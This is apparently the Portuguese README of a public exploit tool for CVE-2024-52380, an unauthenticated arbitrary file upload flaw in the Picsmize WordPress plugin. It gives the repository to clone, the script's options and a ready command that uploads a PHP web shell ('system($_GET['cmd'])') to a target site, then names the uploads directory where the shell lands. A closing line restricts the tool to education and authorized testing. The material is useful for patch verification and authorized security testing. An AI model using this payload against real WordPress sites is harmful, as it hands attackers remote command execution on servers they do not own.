
O plugin Picsmize para WordPress é vulnerável a upload arbitrário de arquivos.
O plugin Picsmize para WordPress é vulnerável a upload arbitrário de arquivos.
Este script explora uma vulnerabilidade (CVE-2024-52380) no plugin Picsmize para WordPress, permitindo que atacantes não autenticados realizem upload arbitrário de arquivos. Essa vulnerabilidade existe em todas as versões do Picsmize até e incluindo a 1.0.0. A exploração dessa vulnerabilidade pode resultar em execução remota de código no servidor alvo.
requests (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
O script fornece dois argumentos de linha de comando para facilitar o uso:
-u / --url (obrigatório):
-u http://example.com
-c / --content (opcional):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: Diretório raiz do site WordPress.wp-content/uploads: Diretório padrão para uploads de mídia no WordPress.2025/01: A estrutura de diretórios corresponde ao ano (2025) e mês (janeiro) com base na configuração de data do servidor.Este script é destinado apenas a fins educacionais e testes de segurança autorizados. O uso não autorizado desta ferramenta contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.